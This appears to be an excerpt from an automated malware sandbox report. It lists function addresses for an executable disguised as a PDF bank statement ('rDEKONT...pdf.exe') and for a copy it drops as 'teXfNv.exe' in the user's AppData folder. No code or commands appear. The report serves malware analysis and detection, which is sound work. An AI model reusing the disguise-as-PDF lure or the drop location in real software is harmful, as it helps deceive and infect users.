                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_0B8445180_2_0B844518
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_0B84F5380_2_0B84F538
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_0B8464510_2_0B846451
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_0B8464600_2_0B846460
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_00EBA0886_2_00EBA088
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_00EBC19C6_2_00EBC19C
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_00EBD2786_2_00EBD278
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_00EB53706_2_00EB5370
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_00EBC4686_2_00EBC468
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_00EBC7386_2_00EBC738
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_00EB69A06_2_00EB69A0
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_00EBE9886_2_00EBE988
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_00EB3AA16_2_00EB3AA1
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_00EBCA086_2_00EBCA08
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_00EBCCD86_2_00EBCCD8
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_00EB6FC86_2_00EB6FC8
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_00EBCFAA6_2_00EBCFAA
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_00EBF6306_2_00EBF630
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_00EB29EC6_2_00EB29EC
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_00EBE97A6_2_00EBE97A
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_00EBFA8B6_2_00EBFA8B
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_00EB3E096_2_00EB3E09
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_055CA4686_2_055CA468
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_055CAB506_2_055CAB50
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_055C9D106_2_055C9D10
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_055CF8686_2_055CF868
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_055CA4576_2_055CA457
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_055CA4636_2_055CA463
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_055CE7086_2_055CE708
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_055CE1786_2_055CE178
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_055C00406_2_055C0040
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_055C00066_2_055C0006
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_055C82586_2_055C8258
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_055C82686_2_055C8268
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_055CEFB86_2_055CEFB8
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_055CEFA86_2_055CEFA8
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_055CEB516_2_055CEB51
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_055CAB436_2_055CAB43
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_055CEB606_2_055CEB60
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_055C0B306_2_055C0B30
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_055C0B206_2_055C0B20
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_055CD4706_2_055CD470
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_055CD4606_2_055CD460
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_055CF4106_2_055CF410
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_055CF4016_2_055CF401
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_055C9D006_2_055C9D00
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_055CDD206_2_055CDD20
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_055CF8586_2_055CF858
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_055CF8676_2_055CF867
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_055CD8C86_2_055CD8C8
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D48606_2_067D4860
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067DE0C86_2_067DE0C8
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D0E206_2_067D0E20
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D36206_2_067D3620
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D56106_2_067D5610
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D0E106_2_067D0E10
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D360F6_2_067D360F
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D76006_2_067D7600
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D9ED86_2_067D9ED8
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067DBEC86_2_067DBEC8
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D9EC86_2_067D9EC8
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067DBEBB6_2_067DBEBB
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D3F406_2_067D3F40
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D5F306_2_067D5F30
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D3F2F6_2_067D3F2F
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D7F206_2_067D7F20
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067DEF206_2_067DEF20
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D5F1F6_2_067D5F1F
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D7F106_2_067D7F10
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067DEF136_2_067DEF13
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067DA7F86_2_067DA7F8
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067DC7E86_2_067DC7E8
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067DA7E76_2_067DA7E7
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067DC7D86_2_067DC7D8
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067DDFB86_2_067DDFB8
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067DCC786_2_067DCC78
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067DAC7B6_2_067DAC7B
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067DCC696_2_067DCC69
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D4CF06_2_067D4CF0
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D6CE06_2_067D6CE0
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D4CE06_2_067D4CE0
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D8CD06_2_067D8CD0
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D6CD06_2_067D6CD0
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D8CC06_2_067D8CC0
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067DAC886_2_067DAC88
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067DE57F6_2_067DE57F
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D55FF6_2_067D55FF
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D95F06_2_067D95F0
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D75EF6_2_067D75EF
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D95E06_2_067D95E0
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067DB5A86_2_067DB5A8
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067DD5986_2_067DD598
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067DB5986_2_067DB598
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067DE5906_2_067DE590
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067DD5886_2_067DD588
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067DEA586_2_067DEA58
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067DEA496_2_067DEA49
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D9A486_2_067D9A48
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067DBA386_2_067DBA38
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D9A386_2_067D9A38
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067DDA286_2_067DDA28
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067DBA276_2_067DBA27
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067DDA176_2_067DDA17
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D3AB06_2_067D3AB0
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D5AA06_2_067D5AA0
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D3AA06_2_067D3AA0
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D7A906_2_067D7A90
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D5A906_2_067D5A90
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D7A806_2_067D7A80
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067DA3686_2_067DA368
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067DC3586_2_067DC358
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067DA3586_2_067DA358
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067DC34B6_2_067DC34B
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067DF3E86_2_067DF3E8
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067DF3D76_2_067DF3D7
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D43D06_2_067D43D0
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D63C06_2_067D63C0
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D43C06_2_067D43C0
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D83B06_2_067D83B0
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D63B06_2_067D63B0
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D23A86_2_067D23A8
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D83A16_2_067D83A1
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D23976_2_067D2397
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D68506_2_067D6850
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D484F6_2_067D484F
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D00406_2_067D0040
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D88406_2_067D8840
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D683F6_2_067D683F
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D882F6_2_067D882F
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D00076_2_067D0007
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067DD0F86_2_067DD0F8
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067DF8B06_2_067DF8B0
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067DF8A06_2_067DF8A0
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D51716_2_067D5171
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D71706_2_067D7170
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D71616_2_067D7161
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D91606_2_067D9160
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D91516_2_067D9151
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067DB1186_2_067DB118
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067DD1086_2_067DD108
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067DB1086_2_067DB108
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D31906_2_067D3190
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D51806_2_067D5180
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D31806_2_067D3180
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_016025688_2_01602568
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_016008718_2_01600871
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_016014588_2_01601458
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_016096588_2_01609658
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_01601BD08_2_01601BD0
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_016042288_2_01604228
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_016042188_2_01604218
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_0160C4A88_2_0160C4A8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_0160C4B88_2_0160C4B8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_016013418_2_01601341
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_0160331F8_2_0160331F
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_016055E88_2_016055E8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_016055D88_2_016055D8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_016054608_2_01605460
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_016054518_2_01605451
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_016058608_2_01605860
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_016058508_2_01605850
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_018D58E88_2_018D58E8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_018D34E08_2_018D34E0
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_018D04B08_2_018D04B0
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_018D04C08_2_018D04C0
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_018D0E708_2_018D0E70
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_058636A48_2_058636A4
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_058661A88_2_058661A8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_058661F08_2_058661F0
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_058662008_2_05866200
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_08925BF88_2_08925BF8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_08927B108_2_08927B10
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_08920B708_2_08920B70
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_08921C908_2_08921C90
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_089200408_2_08920040
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_089261988_2_08926198
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_089212D88_2_089212D8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_089272608_2_08927260
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_089257B88_2_089257B8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_089239648_2_08923964
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_089239688_2_08923968
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_08926A9F8_2_08926A9F
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_08926AA08_2_08926AA0
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_08924BA48_2_08924BA4
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_08924BA88_2_08924BA8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_08925BF58_2_08925BF5
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_08927B0C8_2_08927B0C
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_08920B618_2_08920B61
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_08921C8F8_2_08921C8F
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_08924DC38_2_08924DC3
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_08924DC88_2_08924DC8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_08925E388_2_08925E38
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_08925E408_2_08925E40
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_0892EE488_2_0892EE48
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_089280F08_2_089280F0
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_089280EC8_2_089280EC
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_089200068_2_08920006
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_0892503F8_2_0892503F
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_089250408_2_08925040
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_089261958_2_08926195
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_0892F2808_2_0892F280
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_089212C98_2_089212C9
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_089272508_2_08927250
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_089265DB8_2_089265DB
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_089265E08_2_089265E0
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_089245138_2_08924513
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_089245188_2_08924518
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_0892F6B88_2_0892F6B8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_089257B48_2_089257B4
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_089217118_2_08921711
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_089217208_2_08921720
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_00FFA08811_2_00FFA088
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_00FFC14711_2_00FFC147
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_00FFD27811_2_00FFD278
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_00FF537011_2_00FF5370
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_00FFC46811_2_00FFC468
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_00FFC73811_2_00FFC738
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_00FF69A011_2_00FF69A0
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_00FFE98811_2_00FFE988
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_00FFCA0811_2_00FFCA08
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_00FFCCD811_2_00FFCCD8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_00FF6FC811_2_00FF6FC8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_00FFCFAA11_2_00FFCFAA
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_00FFF63011_2_00FFF630
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_00FF39ED11_2_00FF39ED
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_00FF29EC11_2_00FF29EC
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_00FFE97A11_2_00FFE97A
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_00FF3AA111_2_00FF3AA1
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_00FFFA8B11_2_00FFFA8B
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_00FF3E0911_2_00FF3E09
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_055FA46811_2_055FA468
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_055FAB5011_2_055FAB50
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_055F9D1011_2_055F9D10
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_055FF86811_2_055FF868
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_055FA45711_2_055FA457
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_055FA46311_2_055FA463
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_055FE70811_2_055FE708
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_055FE6F811_2_055FE6F8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_055FE17811_2_055FE178
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_055FE16811_2_055FE168
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_055F004011_2_055F0040
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_055F000611_2_055F0006
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_055F825811_2_055F8258
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_055F826811_2_055F8268
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_055FEFB811_2_055FEFB8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_055FEFA911_2_055FEFA9
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_055FEB5111_2_055FEB51
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_055FAB4311_2_055FAB43
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_055FEB6011_2_055FEB60
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_055F0B3011_2_055F0B30
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_055F0B2011_2_055F0B20
